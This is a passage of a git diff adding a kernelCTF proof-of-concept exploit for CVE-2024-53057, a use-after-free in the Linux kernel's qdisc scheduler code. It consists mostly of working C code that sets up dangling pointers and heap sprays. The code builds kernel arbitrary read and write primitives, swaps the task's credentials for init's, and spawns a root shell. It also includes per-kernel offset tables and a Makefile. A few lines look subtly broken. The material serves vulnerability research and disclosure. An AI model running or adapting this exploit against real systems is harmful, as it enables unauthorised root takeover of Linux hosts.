clid) { + struct tf_msg *m = &del_filter_msg; + m->tm.tcm_parent = clid & 0xffff0000; + netlink_write(nl_sock_fd, m); + +} + +void switch_ns (int ns) { + nl_sock_fd = nl_socks[ns - 1]; + inet_sock_fd = inet_socks[ns - 1]; + curr_ns = ns; +} + +/* Trigger the bug, creating a dangling pointer to parent class. + * Qdiscs must be configured so packet is enqueued at target class. */ +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} + +/* Functions for reading and writing kernel memory */ + +void write_netem_parms(int handle, int *parms, struct tc_netem_slot *slot) { + struct parms_netem_qdisc_msg *m = &parms_netem_qdisc_msg; + if (parms) { + m->latency = *(long *)&parms[0]; + m->jitter = parms[2]; + // parms[3] corresponds to unwritable memory + m->qopt.loss = parms[4]; + m->ecn = parms[5]; + m->qopt.limit = parms[6]; + // parms[7] corresponds to unwritable memory + m->qopt.gap = parms[8]; + m->qopt.duplicate = parms[9]; + m->reorder.probability = parms[10]; + m->corrupt.probability = parms[11]; + m->rate64 = *(long *)&parms[12]; + } + if (slot) + m->slot = *slot; + tc_add_qd(m, 0, handle); +} + +void read_netem_parms (int handle, char *buf) { + int nread, tread = 0; + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(int *)&msgbuf[i] == handle /* "netem" */ + && *(long *)&msgbuf[i + 16] == 0x6d6574656e) { + off = i; + break; + } + } + + if (off != -1) { + memcpy(buf, msgbuf + off + 56, 8); // latency + memcpy(buf + 8, msgbuf + off + 68, 8); // jitter + memcpy(buf + 16, msgbuf + off + 36, 4); // loss + memcpy(buf + 20, msgbuf + off + 140, 4); // ecn + memcpy(buf + 24, msgbuf + off + 32, 4); // limit + memset(buf + 28, 0, 4); // counter (always zero) + memcpy(buf + 32, msgbuf + off + 40, 4); // gap + memcpy(buf + 36, msgbuf + off + 44, 4); // duplicate + memcpy(buf + 40, msgbuf + off + 96, 4); // reorder + memcpy(buf + 44, msgbuf + off + 108, 4); // corrupt + memcpy(buf + 48, msgbuf + off + 120, 8); // rate + } + memset(msgbuf, 0, sizeof(msgbuf)); +} + +long *stab_addr; +int stab_handle; +int stab_ns; +long stab_needle; +long stab_parms_buf[7], stab_slot_buf[5]; + +void setup_stab_read (int handle, long parms_kaddr, long slot_kaddr, int ns) { + int flags = 0x80; + memcpy((char *)stab_parms_buf + 9, &flags, 4); + slot_kaddr += 32; + memcpy((char *)stab_parms_buf + 33, &slot_kaddr, 8); + slot_kaddr -= 32; + + parms_kaddr += 48 - IFINDEX_OFF; + memcpy((char *)stab_parms_buf + 1, &parms_kaddr, 8); + parms_kaddr -= 48 - IFINDEX_OFF; + + stab_parms_buf[6] = 0xdeadbeef; // lower bytes of needle + + stab_slot_buf[1] = 0; // flags ; limit + stab_slot_buf[2] = parms_kaddr + 232; // ops + stab_slot_buf[3] = 0xbad57ab; // stab + stab_slot_buf[4] = 0; // hash + + stab_addr = &stab_slot_buf[3]; + stab_needle = stab_slot_buf[2] << 32 | stab_parms_buf[6]; + stab_handle = handle; + stab_ns = ns; +} + +void read_netem_stab (long needle, char *buf, int n) { + int nread, tread = 0; + + int old_ns = curr_ns; + switch_ns(stab_ns); + + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= - sizeof(int); i++) { + if (*(long *)&msgbuf[i] == needle) { + off = i; + break; + } + } + + n = n > 24 ? 24 : n; + if (off != -1) + memcpy(buf, msgbuf + off + STAB_OFF, n); + else + printf("[-] Failed to find stab\n"); + + memset(msgbuf, 0, sizeof(msgbuf)); + switch_ns(old_ns); +} + +long stab_read_8 (long addr) { + long val; + int old_ns = curr_ns; + switch_ns(stab_ns); + *stab_addr = addr - 32; + write_netem_parms(stab_handle, stab_parms_buf, stab_slot_buf); + tc_add_qd(&parms_netem_qdisc_msg, 0, stab_handle); + read_netem_stab(stab_needle, &val, 8); + switch_ns(old_ns); + return val; +} + +int vt_handle; +int vt_ns; +long vt_dist_p_kaddr; +long setup_vt_write (int handle, long addr, int ns) { + int old_ns = curr_ns; + vt_ns = ns; + switch_ns(vt_ns); + vt_handle = handle; + vt_dist_p_kaddr = addr + PRIVDATA_OFF + SLOT_DIST_OFF; + hfsc_qdisc_msg.def = 0; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x150000); + switch_ns(old_ns); +} + +long root_addr; +void vt_write_8 (long addr, long val) { + long parms[7] = {}, *hfsc_class, dist_kaddr; + + int old_ns = curr_ns; + switch_ns(vt_ns); + + hfsc_class = &dist_netem_qdisc_msg.dist[HFSC_CLASS_START]; + ((int *)hfsc_class)[LEVEL_OFF/4] = 1; + hfsc_class[PARENT_OFF/8] = addr - CL_CVTMIN_OFF; + hfsc_class[CL_VT_OFF/8] = val; + + tc_add_qd(&dist_netem_qdisc_msg, 0, vt_handle); + + dist_kaddr = stab_read_8(vt_dist_p_kaddr); + dist_kaddr += TABLE_OFF + HFSC_CLASS_START + VT_NODE_OFF; + memcpy((char *)parms + 1, &dist_kaddr, 8); + + write_netem_parms(vt_handle, parms, NULL); + loopback_send(); + + switch_ns(old_ns); +} + +/* Functions for setting timers */ + +int add_order[] = { 0, 1, 2, 4, 9, 3, 5, 11, 10, 13, 12, 15, 6, 7, 8, 14, 16, }; +#define NUM_NODES (sizeof(add_order)/sizeof(*add_order)) +#define NUM_NEG_NODES 20 +int timer_fds[NUM_NODES]; +int neg_timerfds[NUM_NEG_NODES]; +void init_timers () { + for (int i = 0; i < NUM_NODES - 2; i++) { + timer_fds[add_order[i]] = timerfd_create(CLOCK_MONOTONIC, 0); + if (timer_fds[i] == -2) + err_exit("[-] timerfd_create"); + } + for (int i = 0; i < NUM_NEG_NODES; i++) { + neg_timerfds[i] = timerfd_create(CLOCK_MONOTONIC, 0); + if (neg_timerfds[i] == -1) + err_exit("[-] timerfd_create"); + } +} + +void add_neg_nodes (void) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(-1); + for (int i = 0; i < NUM_NEG_NODES; i++) { + if (timerfd_settime(neg_timerfds[i], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); + } +} + +void add_timer_node (long label) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(label); + if (timerfd_settime(timer_fds[label], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +void rm_timer_node (long val) { + struct itimerspec t = {}; + if (timerfd_settime(timer_fds[val], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +#define GR 0x61c88647u +#define QDISC_HASH(x) ((x)*GR >> 28) +long handle_to_kaddr (int handle, long netdevq_kaddr) { + long next_addr; + next_addr = stab_read_8(netdevq_kaddr + NET_DEVICE_OFF) + QDISC_HASH_TABLE_OFF; + next_addr = stab_read_8(next_addr + 8*QDISC_HASH(handle)); + while (next_addr) { + if ((int)stab_read_8(next_addr + HANDLE_OFF - QDISC_HLIST_OFF) == handle) + return next_addr - QDISC_HLIST_OFF; + next_addr = stab_read_8(next_addr); + } + return 0; +} + +int drr_spray_and_find (int parent) { + int drr_spray[DRR_SPRAY]; + + for (int i = 0; i < DRR_SPRAY; i++) + drr_spray[i] = tc_add_cl(&drr_class_msg, parent, i + 1); + + int target = 0; + for (int i = 0; i < DRR_SPRAY; i++) { + if (!target) { + tc_add_fl(&basic_filter_msg, drr_spray[i]); + loopback_send(); + if (recv(inet_sock_fd, &msgbuf, 1, MSG_DONTWAIT) != -1) { + target = drr_spray[i]; + printf("[+] Found target DRR class %x\n", target); + continue; + } + tc_del_fl(drr_spray[i]); + } + tc_del_cl(drr_spray[i]); + } + + if (!target) + printf("[-] DRR spray on %x failed\n", parent); + + return target; +} + +int add_qdisc_timer_node (int parent, int root, int *spray_handles, + int spray_hash, int label, int ns_outer, int ns_inner) { + + /* Handles of the current leaf of the three branches, and handle of tbf qdisc's parent */ + int b1, b2, b3, pin, tbfp; + + switch_ns(ns_outer); + + /* Add subtree root */ + hfsc_qdisc_msg.def = 1; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + /* Set up upper layers */ + b1 = tc_add_cl(&rsc_class_msg, root, 1); + b1 = tc_add_qd(&drr_qdisc_msg, b1, 0xffff0000); + pin = tc_add_cl(&drr_class_msg, b1, 2); + b1 = tc_add_cl(&drr_class_msg, b1, 1); + + switch_ns(ns_inner); + b2 = tc_add_qd(&drr_qdisc_msg, -1, root + 0x30000); + switch_ns(ns_outer); + + b3 = tc_add_cl(&fsc_class_msg, root, 3); + b3 = tc_add_qd(&drr_qdisc_msg, b3, root + 0x40000); + tc_add_fl(&basic_filter_msg, b3 | 1); + + /* Create dangling pointer above TBF qdisc */ + tc_add_fl(&basic_filter_msg, b1); + trigger_vuln(b1); + + tc_del_fl(b1); + tc_add_fl(&basic_filter_msg, pin); + trigger_vuln(pin); + + hfsc_qdisc_msg.def = 3; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + tc_del_cl(b1); // Create dangling pointer + switch_ns(ns_inner); + tbfp = tc_add_cl(&drr_class_msg, b2, 1); + + /* Spray to prevent a later allocation + accidentally going under the dangling pointer + in case the allocation above missed it */ + for (int i = 1; i < DRR_SPRAY; i++) + tc_add_cl(&drr_class_msg, b2, i + 1); + tc_add_fl(&basic_filter_msg, tbfp); + + /* Add TBF qdisc */ + b2 = tc_add_qd(&tbf_qdisc_msg, tbfp, root + 0x50000); + b2 = tc_add_qd(&drr_qdisc_msg, b2, 0xffff0000); + tc_add_fl(&basic_filter_msg, b2 | 1); + + /* Create dangling pointer under TBF qdisc */ + b2 = tc_add_cl(&drr_class_msg, b2, 1); + + trigger_vuln(b2); + + tc_del_fl(tbfp); + tc_del_cl(b2); // Create dangling pointer + switch_ns(ns_outer); + b3 = drr_spray_and_find(b3); + + if (!b3) { + tc_del_qd(-1); + switch_ns(ns_inner); + tc_del_qd(-1); + switch_ns(ns_outer); + return 1; + } + + + switch_ns(ns_inner); + + for (int i = 0; i < clog_len; i++) + tc_add_cl(&drr_class_msg, 0xffff0000, i + 2); + + tc_add_qd(&stall_tbf_qdisc_msg, tbfp, 0); + + switch_ns(ns_outer); + + /* Choose netem handles */ + for (int i = 0x10000000, j = 0; j < NETEM_SPRAY; i += 0x10000) { + if (QDISC_HASH(i) == spray_hash) + spray_handles[j++] = i; + } + + /* Wait for previously deleted qdiscs to be freed */ + printf("[*] Adding qdisc timer node %d\n", label); + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Destroy TBF qdisc */ + switch_ns(ns_inner); + tc_del_cl(tbfp); + switch_ns(ns_outer); + + /* Set timer on TBF qdisc */ + if (sendto(inet_sock_fd, &msgbuf, LABEL_TO_VALUE(label), 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); + + /* Wait for TBF qdisc to be freed */ + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Spray netem qdiscs */ + for (int i = 0; i < NETEM_SPRAY; i++) + b3 = tc_add_qd(&parms_netem_qdisc_msg, b3, spray_handles[i]); + + return 0; +} + +int main (int argc, char **argv) { + + if (argc > 1) { + clog_len = atoi(argv[1]); + } else { + clog_len = CLOG_LEN; + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + + for (int i = 0; i < 4; i++) { + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open socket to send netlink commands to */ + nl_socks[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_socks[i] == -1) + err_exit("[-] nl socket"); + + /* Set lo up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_socks[i], &if_up_msg); + + /* Open inet sockets */ + iaddr.sin_family = AF_INET; + iaddr.sin_port = htons(1); + iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + inet_socks[i] = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_socks[i] == -1) + err_exit("[-] inet socket"); + if (bind(inet_socks[i], &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] inet bind"); + } + + pin_cpu(0); + + /* Add timer nodes to tree */ + init_timers(); + add_neg_nodes(); + for (int i = 0; i < NUM_NODES - 2; i++) + add_timer_node(add_order[i]); + + /* Add dangling qdisc pointers to tree */ + int parent, n1, n2, netem_spray1[NETEM_SPRAY], netem_spray2[NETEM_SPRAY], enq_qd; + + switch_ns(1); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x150000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x1000000, netem_spray1, 1, add_order[NUM_NODES - 2], 1, 3)); + + switch_ns(2); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x20000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x2000000, netem_spray2, 2, add_order[NUM_NODES - 1], 2, 4)); + + /* Enqueue a packet at netem_spray[0] for later */ + switch_ns(2); + hfsc_qdisc_msg.def = 2; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x20000); + parent = tc_add_cl(&rsc_class_msg, 0x20000, 2); + enq_qd = tc_add_qd(&delay_netem_qdisc_msg, parent, 0x2a0000); + loopback_send(); + + + /* Leak heap addresses of attacker netem qdics by removing 15 */ + + long n1_base_kaddr, n1_parms_kaddr, n1_slot_kaddr, n2_base_kaddr, n2_parms_kaddr, n2_slot_kaddr; + long n1_parms_buf[7] = {}, n2_parms_buf[7] = {}; + long n1_slot_buf[5] = {}, n2_slot_buf[5] = {}; + + rm_timer_node(15); + + switch_ns(1); + n1 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray1[i], n1_parms_buf); + if (n1_parms_buf[0]) { + n1 = netem_spray1[i]; + break; + } + } + + switch_ns(2); + n2 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray2[i], n2_parms_buf); + if (n2_parms_buf[0]) { + n2 = netem_spray2[i]; + break; + } + } + if (n1 == -1 || n2 == -1) { + printf("[-] Heap address leak failed: n1 = %x, n2 = %x\n", n1, n2); + exit(EXIT_FAILURE); + } + + if (NETEM_SPRAY > 1) { + switch_ns(1); + tc_del_qd(n1); + switch_ns(2); + tc_del_qd(n2); + } + + + n2_parms_kaddr = n1_parms_buf[0]; + n2_base_kaddr = n2_parms_kaddr & ~1023; + n2_slot_kaddr = n2_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + n1_parms_kaddr = n2_parms_buf[2]; + n1_base_kaddr = n1_parms_kaddr & ~1023; + n1_slot_kaddr = n1_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + printf("[+] Found qdiscs: n1 handle = %x, n1 addr = %p\n" + " n2 handle = %x, n2 addr = %p\n", + n1, n1_base_kaddr, n2, n2_base_kaddr); + + + /* Overwrite n2->slot_dist by removing 13 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (s) (c) + \ + (c) + + y is at &n2->latency + */ + + n2_parms_buf[2] = n1_parms_kaddr + 32; // y->rb_left = s = &n1_latency + 32 + n1_parms_buf[5] = n2_base_kaddr + PRIVDATA_OFF + SLOT_DIST_OFF; // s->rb_right = &n2->slot_dist + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + + rm_timer_node(13); + + /* Overwrite n2->hash.next by removing 11 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->latency + 32 + */ + + n1_parms_buf[6] = n2_parms_kaddr + 32; // y->rb_left = p = &n1->latency + 32 + n2_parms_buf[6] = n1_slot_kaddr + 8; // p->rb_left = s = &n1->slot + 8 + n1_slot_buf[2] = n2_base_kaddr + 40; // s->rb_right = c = &n2->hash.next + n1_slot_buf[3] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + rm_timer_node(11); + + /* Set up arbitrary read */ + setup_stab_read(n2, n2_parms_kaddr, n2_slot_kaddr, 2); + + printf("[*] Arbitrary read set up\n"); + + /* Overwrite root qdisc's vt_tree by removing 9 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->slot + 8 + */ + + long root_qdisc_kaddr, netdevq_kaddr; + + netdevq_kaddr = stab_read_8(n1_base_kaddr + NETDEV_OFF); + root_qdisc_kaddr = stab_read_8(netdevq_kaddr + ROOT_QDISC_OFF); + + n1_slot_buf[3] = n1_parms_kaddr - 16; // y->rb_left = &n1->latency - 16 + n1_parms_buf[0] = n1_parms_kaddr + 32; // p->rb_left = &n1->latency + 32 + n1_parms_buf[5] = root_qdisc_kaddr + PRIVDATA_OFF + ROOT_OFF + + VT_TREE_OFF; // s->rb_left = &root_qdisc->privdata.root.vt_tree + n1_parms_buf[6] = 0; // s->rb_right = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + + rm_timer_node(9); + + /* Set up vt_node write primitive */ + setup_vt_write(n1, n1_base_kaddr, 1); + + printf("[*] Write-what-where set up\n"); + + /* Set f_owner pointer in socket file */ + if (fcntl(inet_socks[1], F_SETOWN, getpid()) == -1) + err_exit("[-] fcntl"); + + /* Read kernel pointers */ + long task_kaddr, init_task_kaddr, init_cred_kaddr, init_fs_kaddr; + long next_addr; + + printf("[*] Getting kernel pointers\n"); + + netdevq_kaddr = stab_read_8(n2_base_kaddr + NETDEV_OFF); + next_addr = handle_to_kaddr(enq_qd, netdevq_kaddr); + + next_addr = stab_read_8(next_addr + PRIVDATA_OFF + T_HEAD_OFF); + next_addr = stab_read_8(next_addr + SK_OFF); + next_addr = stab_read_8(next_addr + SOCK_OFF); + next_addr = stab_read_8(next_addr + FILE_OFF); + next_addr = stab_read_8(next_addr + F_OWNER_OFF + PID_OFF); + next_addr = stab_read_8(next_addr + TASKS_OFF); + task_kaddr = next_addr -= PID_LINKS_OFF; + + do { + init_task_kaddr = next_addr; + next_addr = stab_read_8(next_addr + REAL_PARENT_OFF); + } while (next_addr != init_task_kaddr); + + init_cred_kaddr = stab_read_8(init_task_kaddr + CRED_OFF); + init_fs_kaddr = stab_read_8(init_task_kaddr + FS_OFF); + + printf("[+] task: %p, init_cred: %p, init_fs: %p\n", + task_kaddr, init_cred_kaddr, init_fs_kaddr); + + printf("[*] Overwriting cred and fs\n"); + + /* LPE */ + vt_write_8(task_kaddr + FS_OFF, init_fs_kaddr); + vt_write_8(task_kaddr + CRED_OFF, init_cred_kaddr); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[*] Launching shell\n"); + system("/bin/sh"); + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/Makefile new file mode 100644 index 000000000..bcae6348f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/Makefile @@ -0,0 +1,7 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D MITIGATION + +exploit: exploit.c + gcc $(CFLAGS) -o $@ $< + +run: + ./exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit new file mode 100644 index 000000000..833b38382 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c new file mode 100644 index 000000000..e3e8e4820 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c @@ -0,0 +1,1465 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#if defined(MITIGATION) || defined(COS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 280 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 336 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 100 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 968 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 216 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 112 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1632 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1536 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 2008 // offsetof(struct task_struct, cred) +#define FS_OFF 2088 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 40 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 1000 + +#elif defined(LTS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 296 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 352 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 96 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 1032 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 224 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 80 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1608 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1512 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 1984 // offsetof(struct task_struct, cred) +#define FS_OFF 2064 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 48 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 0 + +#endif + +/* Traffic control handles */ +#define VULN_NETEM_HANDLE 0xdead0000 + +/* Size of disttable */ +#define DIST_SIZE 1020 + +#define TIMER_BASE 50000 +#define TIMER_INC 100 +#define LABEL_TO_VALUE(x) (TIMER_BASE + TIMER_INC*x) + +#define DRR_SPRAY 36 +#define NETEM_SPRAY 20 + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +int clog_len; +int curr_ns; +unsigned char msgbuf[65536]; + +/* Netlink Messages */ + +/* Traffic control message header */ +struct __attribute__((packed)) tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +}; + +/* Network interface message header */ +struct __attribute__((packed)) if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Set network interface up */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + +/* Add/modify an HFSC qdisc */ +struct __attribute__((packed)) hfsc_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + int def; +}; + +struct hfsc_qdisc_msg hfsc_qdisc_msg = { + { + .nlmsg_len = sizeof(struct hfsc_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 8, + .rta_type = TCA_OPTIONS, + }, +}; + +/* Add/modify an RSC HFSC class */ +struct __attribute__((packed)) rsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr rsc_hdr; + struct tc_service_curve rsc; +}; + +struct rsc_class_msg rsc_class_msg = { + { + .nlmsg_len = sizeof(struct rsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .rsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_RSC, + }, + .rsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an FSC HFSC class */ +struct __attribute__((packed)) fsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; +}; + +struct fsc_class_msg fsc_class_msg = { + { + .nlmsg_len = sizeof(struct fsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an USC HFSC class */ +struct __attribute__((packed)) usc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; + struct rtattr usc_hdr; + struct tc_service_curve usc; +}; + +struct usc_class_msg 